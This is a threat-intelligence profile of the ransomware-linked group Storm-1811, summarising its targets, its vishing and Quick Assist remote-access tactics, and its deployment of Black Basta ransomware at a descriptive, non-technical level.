Storm-1811 | |
Date of Initial Activity | April 2024 |
Suspected attribution | Cybercriminal |
Government Affiliation | No |
Motivation | Financial Gain |
Associated tools | Quick Assist |
Overview
Common targets
Storm-1811 primarily targets organizations that may have vulnerable remote access systems or insufficient cybersecurity defenses. The group’s use of Quick Assist, a tool designed for legitimate remote support, suggests a focus on entities where such tools are commonly used for troubleshooting and support purposes.
Their primary targets often include:
Small to Medium Enterprises (SMEs): These organizations might lack advanced security measures and are often seen as easier targets compared to larger corporations.
Service Providers: Companies offering IT support services, where remote access tools like Quick Assist are routinely used, can be targeted to exploit their access to multiple client systems.
Healthcare and Financial Institutions: Sectors with sensitive data are attractive due to the potential for high-impact ransomware attacks, which can disrupt operations and cause significant financial loss.
Educational Institutions: Schools and universities, which frequently use remote support tools for staff and student support, are vulnerable to such attacks.
Attack Vectors
Vishing (Voice Phishing)
Exploitation of Remote Support Tools (e.g., Quick Assist)
Social Engineering
File-based Malware (e.g., Trojan Horse WS.Malware.2)
Ransomware Deployment (e.g., Black Basta)
How they operate
Storm-1811 operates through a sophisticated approach that leverages social engineering and technical exploitation to execute their attacks. Their primary strategy involves vishing, or voice phishing, where they deceive victims into providing remote access to their systems. The group exploits legitimate remote support tools, such as Quick Assist, which are designed to facilitate troubleshooting by allowing one user to control another’s system remotely. By impersonating support personnel or using other manipulative tactics, Storm-1811 convinces the victim to grant full control of their system.
Once remote access is established, Storm-1811 deploys a series of malicious scripts and batch files. These files are engineered to download and execute further malicious components, ultimately leading to the deployment of Black Basta ransomware. This ransomware encrypts files on the compromised system and demands a ransom payment for decryption. The group’s use of these techniques allows them to bypass traditional security defenses by exploiting trusted tools and leveraging social engineering.
Storm-1811’s operations are characterized by their focus on exploiting vulnerabilities in remote support processes and their ability to execute complex attack sequences with minimal direct interaction. Their attacks often target organizations that use remote support tools frequently, including small to medium enterprises, service providers, and sectors with sensitive data such as healthcare and finance. By combining technical skill with psychological manipulation, Storm-1811 effectively infiltrates and disrupts their targets, making their attacks both dangerous and difficult to detect.
